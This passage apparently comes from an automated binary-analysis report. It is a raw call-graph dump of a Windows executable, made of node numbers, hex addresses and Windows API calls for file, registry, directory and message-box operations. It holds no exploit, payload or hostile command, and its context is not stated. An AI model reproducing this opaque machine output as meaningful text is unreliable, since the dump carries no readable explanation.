5226->5229 5228 40322c 4 API calls 5227->5228 5230 4055a3 5228->5230 5229->5230 5284 4033b4 5230->5284 5232 4055c7 5233 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5232->5233 5234 4055e1 5233->5234 5235 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5234->5235 5236 4055fb 5235->5236 5237 405ce4 GetVersionExA 5236->5237 5238 405cfb 5237->5238 5238->5047 5240 40593c 5239->5240 5247 404ccc LoadStringA 5240->5247 5243 4031e8 4 API calls 5244 40596d 5243->5244 5250 403198 5244->5250 5254 403278 5247->5254 5251 4031b7 5250->5251 5252 40319e 5250->5252 5251->5170 5252->5251 5268 4025ac 5252->5268 5259 403254 5254->5259 5256 403288 5257 403198 4 API calls 5256->5257 5258 4032a0 5257->5258 5258->5243 5260 403274 5259->5260 5261 403258 5259->5261 5260->5256 5264 402594 5261->5264 5263 403261 5263->5256 5265 402598 5264->5265 5266 4025a2 5264->5266 5265->5266 5267 403154 4 API calls 5265->5267 5266->5263 5266->5266 5267->5266 5269 4025b0 5268->5269 5270 4025ba 5268->5270 5269->5270 5271 403154 4 API calls 5269->5271 5270->5251 5271->5270 5274 4031be 5272->5274 5273 4031e3 5273->5182 5274->5273 5275 4025ac 4 API calls 5274->5275 5275->5274 5277 405223 5276->5277 5278 405235 5276->5278 5279 403278 4 API calls 5277->5279 5280 40322c 4 API calls 5278->5280 5281 405233 5279->5281 5280->5281 5281->5185 5283 405264 5282->5283 5283->5193 5285 4033bc 5284->5285 5286 403254 4 API calls 5285->5286 5287 4033cf 5286->5287 5288 4031e8 4 API calls 5287->5288 5289 4033f7 5288->5289 5292 403230 5290->5292 5291 403252 5291->5223 5292->5291 5293 4025ac 4 API calls 5292->5293 5293->5291 5302 403414 5294->5302 5297 406fee 5298 407284 FormatMessageA 5297->5298 5299 4072aa 5298->5299 5300 403278 4 API calls 5299->5300 5301 4072c7 5300->5301 5301->5054 5303 403418 LoadLibraryA 5302->5303 5303->5297 5311 406af0 5304->5311 5306 406bf3 5307 406c05 5306->5307 5308 406af0 4 API calls 5306->5308 5309 403198 4 API calls 5307->5309 5308->5306 5310 406c1a 5309->5310 5310->5069 5312 406b1c 5311->5312 5313 403278 4 API calls 5312->5313 5314 406b29 5313->5314 5321 403420 5314->5321 5316 406b31 5317 4031e8 4 API calls 5316->5317 5318 406b49 5317->5318 5319 403198 4 API calls 5318->5319 5320 406b6b 5319->5320 5320->5306 5322 403426 5321->5322 5324 403437 5321->5324 5323 403254 4 API calls 5322->5323 5322->5324 5323->5324 5324->5316 5326 407578 5325->5326 5327 4075b7 CreateFileA 5326->5327 5327->5092 5329 403414 5328->5329 5330 4075b7 CreateFileA 5329->5330 5330->5092 5334 4073ec 5331->5334 5335 407284 5 API calls 5334->5335 5336 407414 5335->5336 5337 407434 5336->5337 5343 405184 5336->5343 5346 405880 5337->5346 5340 407443 5341 403198 4 API calls 5340->5341 5342 407460 5341->5342 5342->5093 5350 405198 5343->5350 5347 405887 5346->5347 5348 4031e8 4 API calls 5347->5348 5349 40589f 5348->5349 5349->5340 5351 4051b5 5350->5351 5358 404e48 5351->5358 5354 4051e1 5356 403278 4 API calls 5354->5356 5357 405193 5356->5357 5357->5337 5361 404e63 5358->5361 5359 404e75 5359->5354 5363 404bd4 5359->5363 5361->5359 5366 404f6a 5361->5366 5373 404e3c 5361->5373 5364 405930 5 API calls 5363->5364 5365 404be5 5364->5365 5365->5354 5367 404f7b 5366->5367 5370 404fc9 5366->5370 5369 40504f 5367->5369 5367->5370 5372 404fe7 5369->5372 5380 404e28 5369->5380 5370->5372 5376 404de4 5370->5376 5372->5361 5374 403198 4 API calls 5373->5374 5375 404e46 5374->5375 5375->5361 5377 404df2 5376->5377 5383 404bec 5377->5383 5379 404e20 5379->5370 5396 4039a4 5380->5396 5386 4059a0 5383->5386 5385 404c05 5385->5379 5387 4059ae 5386->5387 5388 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5387->5388 5389 4059d8 5388->5389 5390 405184 19 API calls 5389->5390 5391 4059e6 5390->5391 5392 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5391->5392 5393 4059f1 5392->5393 5394 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5393->5394 5395 405a0b 5394->5395 5395->5385 5397 4039ab 5396->5397 5402 4038b4 5397->5402 5399 4039cb 5400 403198 4 API calls 5399->5400 5401 4039d2 5400->5401 5401->5372 5403 4038d5 5402->5403 5404 4038c8 5402->5404 5406 403934 5403->5406 5407 4038db 5403->5407 5405 403780 6 API calls 5404->5405 5410 4038d0 5405->5410 5408 403993 5406->5408 5409 40393b 5406->5409 5411 4038e1 5407->5411 5412 4038ee 5407->5412 5414 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5408->5414 5415 403941 5409->5415 5416 40394b 5409->5416 5410->5399 5417 403894 6 API calls 5411->5417 5413 403894 6 API calls 5412->5413 5418 4038fc 5413->5418 5414->5410 5419 403864 9 API calls 5415->5419 5420 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5416->5420 5417->5410 5422 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5418->5422 5419->5410 5421 40395d 5420->5421 5423 403864 9 API calls 5421->5423 5424 403917 5422->5424 5425 403976 5423->5425 5426 40374c VariantClear 5424->5426 5427 40374c VariantClear 5425->5427 5428 40392c 5426->5428 5429 40398b 5427->5429 5428->5399 5429->5399 5431 4034fd 5430->5431 5438 40352d 5430->5438 5432 403526 5431->5432 5434 403509 5431->5434 5435 403254 4 API calls 5432->5435 5433 403198 4 API calls 5436 403517 5433->5436 5445 4025c4 5434->5445 5435->5438 5436->5135 5438->5433 5440 407cd3 5439->5440 5441 407cc8 5439->5441 5449 407c5c 5440->5449 5441->5127 5444 405880 4 API calls 5444->5441 5446 4025ca 5445->5446 5447 4025dc 5446->5447 5448 403154 4 API calls 5446->5448 5447->5436 5447->5447 5448->5447 5450 407c70 5449->5450 5451 407caf 5449->5451 5450->5451 5453 407bac 5450->5453 5451->5441 5451->5444 5454 407bb7 5453->5454 5455 407bc8 5453->5455 5456 405880 4 API calls 5454->5456 5457 4074a0 20 API calls 5455->5457 5456->5455 5458 407bdc 5457->5458 5459 4074a0 20 API calls 5458->5459 5460 407bfd 5459->5460 5461 407918 InterlockedExchange 5460->5461 5462 407c12 5461->5462 5463 407c28 5462->5463 5464 405880 4 API calls 5462->5464 5463->5450 5464->5463 5466 4078d6 5465->5466 5467 4078e7 5465->5467 5468 4078db InterlockedExchange 5466->5468 5467->5013 5468->5467 6241 409e47 6242 409e6c 6241->6242 6243 4098f4 15 API calls 6242->6243 6246 409e71 6243->6246 6244 409ec4 6275 4026c4 GetSystemTime 6244->6275 6246->6244 6249 408dd8 4 API calls 6246->6249 6247 409ec9 6248 409330 32 API calls 6247->6248 6250 409ed1 6248->6250 6252 409ea0 6249->6252 6251 4031e8 4 API calls 6250->6251 6253 409ede 6251->6253 6255 409ea8 MessageBoxA 6252->6255 6254 406928 5 API calls 6253->6254 6256 409eeb 6254->6256 6255->6244 6257 409eb5 6255->6257 6258 4066c0 5 API calls 6256->6258 6259 405854 5 API calls 6257->6259 6260 409efb 6258->6260 6259->6244 6261 406638 5 API calls 6260->6261 6262 409f0c 6261->6262 6263 403340 4 API calls 6262->6263 6264 409f1a 6263->6264 6265 4031e8 4 API calls 6264->6265 6266 409f2a 6265->6266 6267 4074e0 23 API calls 6266->6267 6268 409f69 6267->6268 6269 402594 4 API calls 6268->6269 6270 409f89 6269->6270 6271 407a28 5 API calls 6270->6271 6272 409fcb 6271->6272 6273 407cb8 21 API calls 6272->6273 6274 409ff2 6273->6274 6275->6247 6202 407548 6203 407554 CloseHandle 6202->6203 6204 40755d 6202->6204 6203->6204 6654 402b48 RaiseException 6205 407749 6206 4076dc WriteFile 6205->6206 6214 407724 6205->6214 6207 4076e8 6206->6207 6208 4076ef 6206->6208 6210 40748c 21 API calls 6207->6210 6209 407700 6208->6209 6211 4073ec 20 API calls 6208->6211 6210->6208 6211->6209 6212 4077e0 6213 4078db InterlockedExchange 6212->6213 6216 407890 6212->6216 6215 4078e7 6213->6215 6214->6205 6214->6212 6655 40294a 6656 402952 6655->6656 6657 403554 4 API calls 6656->6657 6658 402967 6656->6658 6657->6656 6659 403f4a 6660 403f53 6659->6660 6661 403f5c 6659->6661 6663 403f07 6660->6663 6666 403f09 6663->6666 6665 403f3c 6665->6661 6667 403154 4 API calls 6666->6667 6669 403e9c 6666->6669 6672 403f3d 6666->6672 6686 403e9c 6666->6686 6667->6666 6668 403ef2 6671 402674 4 API calls 6668->6671 6669->6665 6669->6668 6675 403ea9 6669->6675 6677 403e8e 6669->6677 6674 403ecf 6671->6674 6672->6661 6674->6661 6675->6674 6676 402674 4 API calls 6675->6676 6676->6674 6678 403e4c 6677->6678 6679 403e62 6678->6679 6680 403e7b 6678->6680 6683 403e67 6678->6683 6681 403cc8 4 API calls 6679->6681 6682 402674 4 API calls 6680->6682 6681->6683 6684 403e78 6682->6684 6683->6684 6685 402674 4 API calls 6683->6685 6684->6668 6684->6675 6685->6684 6687 403ed7 6686->6687 6693 403ea9 6686->6693 6688 403ef2 6687->6688 6690 403e8e 4 API calls 6687->6690 6691 402674 4 API calls 6688->6691 6689 403ecf 6689->6666 6692 403ee6 6690->6692 6691->6689 6692->6688 6692->6693 6693->6689 6694 402674 4 API calls 6693->6694 6694->6689 6703 405150 6704 405163 6703->6704 6705 404e48 19 API calls 6704->6705 6706 405177 6705->6706 6276 403a52 6277 403a74 6276->6277 6278 403a5a WriteFile 6276->6278 6278->6277 6279 403a78 GetLastError 6278->6279 6279->6277 6280 402654 6281 403154 4 API calls 6280->6281 6282 402614 6281->6282 6283 402632 6282->6283 6284 403154 4 API calls 6282->6284 6284->6283 5651 409e62 5652 409aa0 4 API calls 5651->5652 5653 409e67 5652->5653 5654 409e6c 5653->5654 5754 402f24 5653->5754 5688 4098f4 5654->5688 5657 409ec4 5693 4026c4 GetSystemTime 5657->5693 5659 409e71 5659->5657 5759 408dd8 5659->5759 5660 409ec9 5694 409330 5660->5694 5664 4031e8 4 API calls 5666 409ede 5664->5666 5665 409ea0 5668 409ea8 MessageBoxA 5665->5668 5712 406928 5666->5712 5668->5657 5670 409eb5 5668->5670 5762 405854 5670->5762 5675 409f0c 5739 403340 5675->5739 5677 409f1a 5678 4031e8 4 API calls 5677->5678 5679 409f2a 5678->5679 5680 4074e0 23 API calls 5679->5680 5681 409f69 5680->5681 5682 402594 4 API calls 5681->5682 5683 409f89 5682->5683 5684 407a28 5 API calls 5683->5684 5685 409fcb 5684->5685 5686 407cb8 21 API calls 5685->5686 5687 409ff2 5686->5687 5766 40953c 5688->5766 5693->5660 5701 409350 5694->5701 5697 409375 CreateDirectoryA 5698 4093ed 5697->5698 5699 40937f GetLastError 5697->5699 5700 40322c 4 API calls 5698->5700 5699->5701 5703 4093f7 5700->5703 5701->5697 5702 408dd8 4 API calls 5701->5702 5707 407284 5 API calls 5701->5707 5711 405880 4 API calls 5701->5711 5858 406cf4 5701->5858 5881 409224 5701->5881 5900 404c84 5701->5900 5903 408da8 5701->5903 5702->5701 5705 4031b8 4 API calls 5703->5705 5706 409411 5705->5706 5708 4031b8 4 API calls 5706->5708 5707->5701 5709 40941e 5708->5709 5709->5664 5711->5701 6013 406820 5712->6013 5715 403454 4 API calls 5716 40694a 5715->5716 5717 4066c0 5716->5717 6018 4068e4 5717->6018 5720 4066f0 5722 403340 4 API calls 5720->5722 5721 4066fe 5723 403454 4 API calls 5721->5723 5724 4066fc 5722->5724 5725 406711 5723->5725 5727 403198 4 API calls 5724->5727 5726 403340 4 API calls 5725->5726 5726->5724 5728 406733 5727->5728 5729 406638 5728->5729 5730 406642 5729->5730 5731 406665 5729->5731 6024 406950 5730->6024 5732 40322c 4 API calls 5731->5732 5734 40666e 5732->5734 5734->5675 5735 406649 5735->5731 5736 406654 5735->5736 5737 403340 4 API calls 5736->5737 5738 406662 5737->5738 5738->5675 5740 403344 5739->5740 5741 4033a5 5739->5741 5742 4031e8 5740->5742 5743 40334c 5740->5743 5744 4031fc 5742->5744 5747 403254 4 API calls 5742->5747 5743->5741 5748 4031e8 4 API calls 5743->5748 5749 40335b 5743->5749 5745 403228 5744->5745 5750 4025ac 4 API calls 5744->5750 5745->5677 5746 403254 4 API calls 5751 403375 5746->5751 5747->5744 5748->5749 5749->5746 5750->5745 5752 4031e8 4 API calls 5751->5752 5753 4033a1 5752->5753 5753->5677 5755 403154 4 API calls 5754->5755 5756 402f29 5755->5756 6030 402bcc 5756->6030 5758 402f51 5758->5758 5760 408da8 4 API calls 5759->5760 5761 408df4 5760->5761 5761->5665 5763 405859 5762->5763 5764 405930 5 API calls 5763->5764 5765 40586b 5764->5765 5765->5765 5773 40955b 5766->5773 5767 409590 5769 40959d GetUserDefaultLangID 5767->5769 5774 409592 5767->5774 5768 409594 5784 407024 GetModuleHandleA GetProcAddress 5768->5784 5769->5774 5772 40956f 5778 409884 5772->5778 5773->5767 5773->5768 5773->5772 5774->5772 5775 4095cb GetACP 5774->5775 5776 4095ef 5774->5776 5775->5772 5775->5774 5776->5772 5777 409615 GetACP 5776->5777 5777->5772 5777->5776 5779 40988c 5778->5779 5783 4098c6 5778->5783 5780 403420 4 API calls 5779->5780 5779->5783 5781 4098c0 5780->5781 5842 408e80 5781->5842 5783->5659 5785 407067 5784->5785 5786 40705e 5784->5786 5787 407070 5785->5787 5788 4070a8 5785->5788 5797 403198 4 API calls 5786->5797 5805 406f68 5787->5805 5790 406f68 RegOpenKeyExA 5788->5790 5792 4070c1 5790->5792 5791 407089 5793 4070de 5791->5793 5808 406f5c 5791->5808 5792->5793 5794 406f5c 6 API calls 5792->5794 5795 40322c 4 API calls 5793->5795 5798 4070d5 RegCloseKey 5794->5798 5799 4070eb 5795->5799 5801 407120 5797->5801 5798->5793 5811 4032fc 5799->5811 5803 403198 4 API calls 5801->5803 5804 407128 5803->5804 5804->5774 5806 406f73 5805->5806 5807 406f79 RegOpenKeyExA 5805->5807 5806->5807 5807->5791 5825 406e10 5808->5825 5812 403300 5811->5812 5813 40333f 5811->5813 5814 4031e8 5812->5814 5815 40330a 5812->5815 5813->5786 5819 4031fc 5814->5819 5822 403254 4 API calls 5814->5822 5816 403334 5815->5816 5817 40331d 5815->5817 5818 4034f0 4 API calls 5816->5818 5821 4034f0 4 API calls 5817->5821 5824 403322 5818->5824 5820 403228 5819->5820 5823 4025ac 4 API calls 5819->5823 5820->5786 5821->5824 5822->5819 5823->5820 5824->5786 5826 406e36 RegQueryValueExA 5825->5826 5827 406e7b 5826->5827 5830 406e59 5826->5830 5829 403198 4 API calls 5827->5829 5828 406e73 5831 403198 4 API calls 5828->5831 5832 406f47 RegCloseKey 5829->5832 5830->5827 5830->5828 5833 403278 4 API calls 5830->5833 5834 403420 4 API calls 5830->5834 5831->5827 5832->5793 5833->5830 5835 406eb0 RegQueryValueExA 5834->5835 5835->5826 5836 406ecc 5835->5836 5836->5827 5837 4034f0 4 API calls 5836->5837 5838 406f0e 5837->5838 5839 406f20 5838->5839 5841 403420 4 API calls 5838->5841 5840 4031e8 4 API calls 5839->5840 5840->5827 5841->5839 5843 408e8e 5842->5843 5845 408ea6 5843->5845 5855 408e18 5843->5855 5846 408e18 4 API calls 5845->5846 5847 408eca 5845->5847 5846->5847 5848 407918 InterlockedExchange 5847->5848 5849 408ee5 5848->5849 5850 408e18 4 API calls 5849->5850 5852 408ef8 5849->5852 5850->5852 5851 408e18 4 API calls 5851->5852 5852->5851 5853 403278 4 API calls 5852->5853 5854 408f27 5852->5854 5853->5852 5854->5783 5856 405880 4 API calls 5855->5856 5857 408e29 5856->5857 5857->5845 5907 406a58 5858->5907 5861 406d26 5863 406a58 5 API calls 5861->5863 5865 406d72 5861->5865 5864 406d36 5863->5864 5866 406d42 5864->5866 5867 406a34 7 API calls 5864->5867 5915 406888 5865->5915 5866->5865 5869 406a58 5 API calls 5866->5869 5878 406d67 5866->5878 5867->5866 5872 406d5b 5869->5872 5876 406a34 7 API calls 5872->5876 5872->5878 5873 406638 5 API calls 5874 406d87 5873->5874 5875 40322c 4 API calls 5874->5875 5877 406d91 5875->5877 5876->5878 5879 4031b8 4 API calls 5877->5879 5878->5865 5927 406cc8 GetWindowsDirectoryA 5878->5927 5880 406dab 5879->5880 5880->5701 5882 409244 5881->5882 5883 406638 5 API calls 5882->5883 5884 40925d 5883->5884 5885 40322c 4 API calls 5884->5885 5892 409268 5885->5892 5886 406978 6 API calls 5886->5892 5888 408dd8 4 API calls 5888->5892 5889 4033b4 4 API calls 5889->5892 5891 405880 4 API calls 5891->5892 5892->5886 5892->5888 5892->5889 5892->5891 5893 4092e4 5892->5893 5967 4091b0 5892->5967 5975 409034 5892->5975 5894 40322c 4 API calls 5893->5894 5895 4092ef 5894->5895 5896 4031b8 4 API calls 5895->5896 5897 409309 5896->5897 5898 403198 4 API calls 5897->5898 5899 409311 5898->5899 5899->5701 5901 405198 19 API calls 5900->5901 5902 404ca2 5901->5902 5902->5701 5904 408dc8 5903->5904 6003 408c80 5904->6003 5908 4034f0 4 API calls 5907->5908 5910 406a6b 5908->5910 5909 406a82 GetEnvironmentVariableA 5909->5910 5911 406a8e 5909->5911 5910->5909 5914 406a95 5910->5914 5929 406dec 5910->5929 5912 403198 4 API calls 5911->5912 5912->5914 5914->5861 5924 406a34 5914->5924 5916 403414 5915->5916 5917 4068ab GetFullPathNameA 5916->5917 5918 4068b7 5917->5918 5919 4068ce 5917->5919 5918->5919 5920 4068bf 5918->5920 5921 40322c 4 API calls 5919->5921 5922 403278 4 API calls 5920->5922 5923 4068cc 5921->5923 5922->5923 5923->5873 5933 4069dc 5924->5933 5928 406ce9 5927->5928 5928->5865 5930 406dfa 5929->5930 5931 4034f0 4 API calls 5930->5931 5932 406e08 5931->5932 5932->5910 5940 406978 5933->5940 5935 4069fe 5936 406a06 GetFileAttributesA 5935->5936 5937 406a1b 5936->5937 5938 403198 4 API calls 5937->5938 5939 406a23 5938->5939 5939->5861 5950 406744 5940->5950 5942 4069b0 5945 4069c6 5942->5945 5946 4069bb 5942->5946 5944 406989 5944->5942 5957 406970 CharPrevA 5944->5957 5958 403454 5945->5958 5947 40322c 4 API calls 5946->5947 5949 4069c4 5947->5949 5949->5935 5953 406755 5950->5953 5951 4067b9 5952 406680 IsDBCSLeadByte 5951->5952 5955 4067b4 5951->5955 5952->5955 5953->5951 5954 406773 5953->5954 5954->5955 5965 406680 IsDBCSLeadByte 5954->5965 5955->5944 5957->5944 5959 403486 5958->5959 5960 403459 5958->5960 5961 403198 4 API calls 5959->5961 5960->5959 5963 40346d 5960->5963 5962 40347c 5961->5962 5962->5949 5964 403278 4 API calls 5963->5964 5964->5962 5966 406694 5965->5966 5966->5954 5968 403198 4 API calls 5967->5968 5970 4091d1 5968->5970 5972 4091fe 5970->5972 5984 4032a8 5970->5984 5987 403494 5970->5987 5973 403198 4 API calls 5972->5973 5974 409213 5973->5974 5974->5892 5991 408f70 5975->5991 5977 40904a 5978 40904e 5977->5978 5997 406a48 5977->5997 5978->5892 5981 409081 6000 408fac 5981->6000 5985 403278 4 API calls 5984->5985 5986 4032b5 5985->5986 5986->5970 5988 403498 5987->5988 5989 4034c3 5987->5989 5990 4034f0 4 API calls 5988->5990 5989->5970 5990->5989 5992 408f7a 5991->5992 5993 408f7e 5991->5993 5992->5977 5994 408fa0 SetLastError 5993->5994 5995 408f87 Wow64DisableWow64FsRedirection 5993->5995 5996 408f9b 5994->5996 5995->5996 5996->5977 5998 4069dc 7 API calls 5997->5998 5999 406a52 GetLastError 5998->5999 5999->5981 6001 408fb1 Wow64RevertWow64FsRedirection 6000->6001 6002 408fbb 6000->6002 6001->6002 6002->5892 6004 403198 4 API calls 6003->6004 6005 408cb1 6003->6005 6004->6005 6007 408cc8 6005->6007 6009 403278 4 API calls 6005->6009 6011 408cdc 6005->6011 6012 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6005->6012 6006 4031b8 4 API calls 6008 408d69 6006->6008 6010 4032fc 4 API calls 6007->6010 6008->5701 6009->6005 6010->6011 6011->6006 6012->6005 6014 406744 IsDBCSLeadByte 6013->6014 6016 406835 6014->6016 6015 40687f 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 4068f3 6018->6019 6020 406820 IsDBCSLeadByte 6019->6020 6023 4068fe 6020->6023 6021 4066ea 6021->5720 6021->5721 6022 406680 IsDBCSLeadByte 6022->6023 6023->6021 6023->6022 6025 406957 6024->6025 6026 40695b 6024->6026 6025->5735 6029 406970 CharPrevA 6026->6029 6028 40696c 6028->5735 6029->6028 6031 402bd5 RaiseException 6030->6031 6032 402be6 6030->6032 6031->6032 6032->5758 6285 402e64 6286 402e69 6285->6286 6287 402e7a RtlUnwind 6286->6287 6288 402e5e 6286->6288 6289 402e9d 6287->6289 6306 40667c IsDBCSLeadByte 6307 406694 6306->6307 6719 403f7d 6720 403fa2 6719->6720 6721 403f84 6719->6721 6720->6721 6723 403e8e 4 API calls 6720->6723 6722 403f8c 6721->6722 6724 402674 4 API calls 6721->6724 6723->6721 6725 403fca 6724->6725 6732 403d02 6738 403d12 6732->6738 6733 403ddf ExitProcess 6734 403db8 6736 403cc8 4 API calls 6734->6736 6735 403dea 6737 403dc2 6736->6737 6739 403cc8 4 API calls 6737->6739 6738->6733 6738->6734 6738->6735 6738->6738 6741 403da4 6738->6741 6742 403d8f MessageBoxA 6738->6742 6740 403dcc 6739->6740 6752 4019dc 6740->6752 6748 403fe4 6741->6748 6742->6734 6745 403dd1 6745->6733 6745->6735 6749 403fe8 6748->6749 6750 403f07 4 API calls 6749->6750 6751 404006 6750->6751 6753 401abb 6752->6753 6754 4019ed 6752->6754 6753->6745 6755 401a04 RtlEnterCriticalSection 6754->6755 6756 401a0e LocalFree 6754->6756 6755->6756 6757 401a41 6756->6757 6758 401a2f VirtualFree 6757->6758 6759 401a49 6757->6759 6758->6757 6760 401a70 LocalFree 6759->6760 6761 401a87 6759->6761 6760->6760 6760->6761 6762 401aa9 RtlDeleteCriticalSection 6761->6762 6763 401a9f RtlLeaveCriticalSection 6761->6763 6762->6745 6763->6762 6316 404206 6317 4041cc 6316->6317 6320 40420a 6316->6320 6318 404282 6319 403154 4 API calls 6321 404323 6319->6321 6320->6318 6320->6319 6322 402c08 6325 402c82 6322->6325 6326 402c19 6322->6326 6323 402c56 RtlUnwind 6324 403154 4 API calls 6323->6324 6324->6325 6326->6323 6326->6325 6329 402b28 6326->6329 6330 402b31 RaiseException 6329->6330 6331 402b47 6329->6331 6330->6331 6331->6323 6332 408c10 6333 408c17 6332->6333 6334 403198 4 API calls 6333->6334 6342 408cb1 6334->6342 6335 408cdc 6336 4031b8 4 API calls 6335->6336 6338 408d69 6336->6338 6337 408cc8 6340 4032fc 4 API calls 6337->6340 6339 403278 4 API calls 6339->6342 6340->6335 6341 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6341->6342 6342->6335 6342->6337 6342->6339 6342->6341 6343 40a011 6344 40a036 6343->6344 6345 407918 InterlockedExchange 6344->6345 6347 40a060 6345->6347 6346 40a070 6353 4076ac SetEndOfFile 6346->6353 6347->6346 6348 409aa0 4 API calls 6347->6348 6348->6346 6350 40a08c 6351 4025ac 4 API calls 6350->6351 6352 40a0c3 6351->6352 6354 4076c3 6353->6354 6355 4076bc 6353->6355 6354->6350 6356 40748c 21 API calls 6355->6356 6356->6354 6768 409916 6769 409918 6768->6769 6770 40993a 6769->6770 6771 409956 CallWindowProcA 6769->6771 6771->6770 6084 407017 6085 407008 SetErrorMode 6084->6085 6361 403018 6362 403070 6361->6362 6363 403025 6361->6363 6364 40302a RtlUnwind 6363->6364 6365 40304e 6364->6365 6367 402f78 6365->6367 6368 402be8 6365->6368 6369 402bf1 RaiseException 6368->6369 6370 402c04 6368->6370 6369->6370 6370->6362 6778 409918 6779 40993a 6778->6779 6781 409927 6778->6781 6780 409956 CallWindowProcA 6780->6779 6781->6779 6781->6780 6375 40901e 6376 409010 6375->6376 6377 408fac Wow64RevertWow64FsRedirection 6376->6377 6378 409018 6377->6378 6379 409020 SetLastError 6380 409029 6379->6380 6391 403a28 ReadFile 6392 403a46 6391->6392 6393 403a49 GetLastError 6391->6393 6222 40762c ReadFile 6223 407663 6222->6223 6224 40764c 6222->6224 6225 407652 GetLastError 6224->6225 6226 40765c 6224->6226 6225->6223 6225->6226 6227 40748c 21 API calls 6226->6227 6227->6223 6398 40a02c 6399 409aa0 4 API calls 6398->6399 6400 40a031 6399->6400 6401 40a036 6400->6401 6402 402f24 5 API calls 6400->6402 6403 407918 InterlockedExchange 6401->6403 6402->6401 6404 40a060 6403->6404 6405 40a070 6404->6405 6406 409aa0 4 API calls 6404->6406 6407 4076ac 22 API calls 6405->6407 6406->6405 6408 40a08c 6407->6408 6409 4025ac 4 API calls 6408->6409 6410 40a0c3 6409->6410 6782 40712e 6783 407118 6782->6783 6784 403198 4 API calls 6783->6784 6785 407120 6784->6785 6786 403198 4 API calls 6785->6786 6787 407128 6786->6787 6788 408f30 6791 408dfc 6788->6791 6792 408e05 6791->6792 6793 403198 4 API calls 6792->6793 6794 408e13 6792->6794 6793->6792 6795 403932 6796 403924 6795->6796 6799 40374c 6796->6799 6798 40392c 6800 403766 6799->6800 6801 403759 6799->6801 6800->6798 6801->6800 6802 403779 VariantClear 6801->6802 6802->6798 6033 4075c4 SetFilePointer 6034 4075f7 6033->6034 6035 4075e7 GetLastError 6033->6035 6035->6034 6036 4075f0 6035->6036 6037 40748c 21 API calls 6036->6037 6037->6034 6411 405ac4 6412 405acc 6411->6412 6413 405ad4 6411->6413 6414 405ad2 6412->6414 6415 405adb 6412->6415 6418 405a3c 6414->6418 6416 405930 5 API calls 6415->6416 6416->6413 6419 405a44 6418->6419 6420 405a5e 6419->6420 6421 403154 4 API calls 6419->6421 6422 405a63 6420->6422 6423 405a7a 6420->6423 6421->6419 6424 405930 5 API calls 6422->6424 6425 403154 4 API calls 6423->6425 6426 405a76 6424->6426 6427 405a7f 6425->6427 6429 403154 4 API calls 6426->6429 6428 4059a0 19 API calls 6427->6428 6428->6426 6430 405aa8 6429->6430 6431 403154 4 API calls 6430->6431 6432 405ab6 6431->6432 6432->6413 6433 4076c8 WriteFile 6434 4076e8 6433->6434 6435 4076ef 6433->6435 6437 40748c 21 API calls 6434->6437 6436 407700 6435->6436 6438 4073ec 20 API calls 6435->6438 6437->6435 6438->6436 6439 40a2ca 6448 4096fc 6439->6448 6442 402f24 5 API calls 6443 40a2d4 6442->6443 6444 403198 4 API calls 6443->6444 6445 40a2f3 6444->6445 6446 403198 4 API calls 6445->6446 6447 40a2fb 6446->6447 6457 40569c 6448->6457 6450 409717 6451 409745 6450->6451 6463 40720c 6450->6463 6453 403198 4 API calls 6451->6453 6455 40975a 6453->6455 6454 409735 6456 40973d MessageBoxA 6454->6456 6455->6442 6456->6451 6458 403154 4 API calls 6457->6458 6459 4056a1 6458->6459 6460 4056b9 6459->6460 6461 403154 4 API calls 6459->6461 6460->6450 6462 4056af 6461->6462 6462->6450 6464 40569c 4 API calls 6463->6464 6465 40721b 6464->6465 6466 407221 6465->6466 6467 40722f 6465->6467 6468 40322c 4 API calls 6466->6468 6470 40724b 6467->6470 6471 40723f 6467->6471 6469 40722d 6468->6469 6469->6454 6481 4032b8 6470->6481 6474 4071d0 6471->6474 6475 40322c 4 API calls 6474->6475 6476 4071df 6475->6476 6477 4071fc 6476->6477 6478 406950 CharPrevA 6476->6478 6477->6469 6479 4071eb 6478->6479 6479->6477 6480 4032fc 4 API calls 6479->6480 6480->6477 6482 403278 4 API calls 6481->6482 6483 4032c2 6482->6483 6483->6469 6484 402ccc 6485 402cdd 6484->6485 6489 402cfe 6484->6489 6486 402d88 RtlUnwind 6485->6486 6488 402b28 RaiseException 6485->6488 6485->6489 6487 403154 4 API calls 6486->6487 6487->6489 6490 402d7f 6488->6490 6490->6486 6811 403fcd 6812 403f07 4 API calls 6811->6812 6813 403fd6 6812->6813 6814 403e9c 4 API calls 6813->6814 6815 403fe2 6814->6815 5469 4024d0 5470 4024e4 5469->5470 5471 4024f7 5469->5471 5508 401918 RtlInitializeCriticalSection 5470->5508 5473 402518 5471->5473 5474 40250e RtlEnterCriticalSection 5471->5474 5485 402300 5473->5485 5474->5473 5477 4024ed 5479 402525 5482 402581 5479->5482 5483 402577 RtlLeaveCriticalSection 5479->5483 5481 402531 5481->5479 5515 40215c 5481->5515 5483->5482 5486 402314 5485->5486 5488 402335 5486->5488 5492 4023b8 5486->5492 5489 402344 5488->5489 5529 401b74 5488->5529 5489->5479 5495 401fd4 5489->5495 5492->5489 5493 402455 5492->5493 5532 401d80 5492->5532 5540 401e84 5492->5540 5493->5489 5536 401d00 5493->5536 5496 401fe8 5495->5496 5497 401ffb 5495->5497 5498 401918 4 API calls 5496->5498 5499 402012 RtlEnterCriticalSection 5497->5499 5502 40201c 5497->5502 5500 401fed 5498->5500 5499->5502 5500->5497 5501 401ff1 5500->5501 5507 402052 5501->5507 5502->5507 5622 401ee0 5502->5622 5505 402147 5505->5481 5506 40213d RtlLeaveCriticalSection 5506->5505 5507->5481 5509 401946 5508->5509 5510 40193c RtlEnterCriticalSection 5508->5510 5511 401964 LocalAlloc 5509->5511 5510->5509 5512 40197e 5511->5512 5513 4019c3 RtlLeaveCriticalSection 5512->5513 5514 4019cd 5512->5514 5513->5514 5514->5471 5514->5477 5516 40217a 5515->5516 5517 402175 5515->5517 5519 4021ab RtlEnterCriticalSection 5516->5519 5522 4021b5 5516->5522 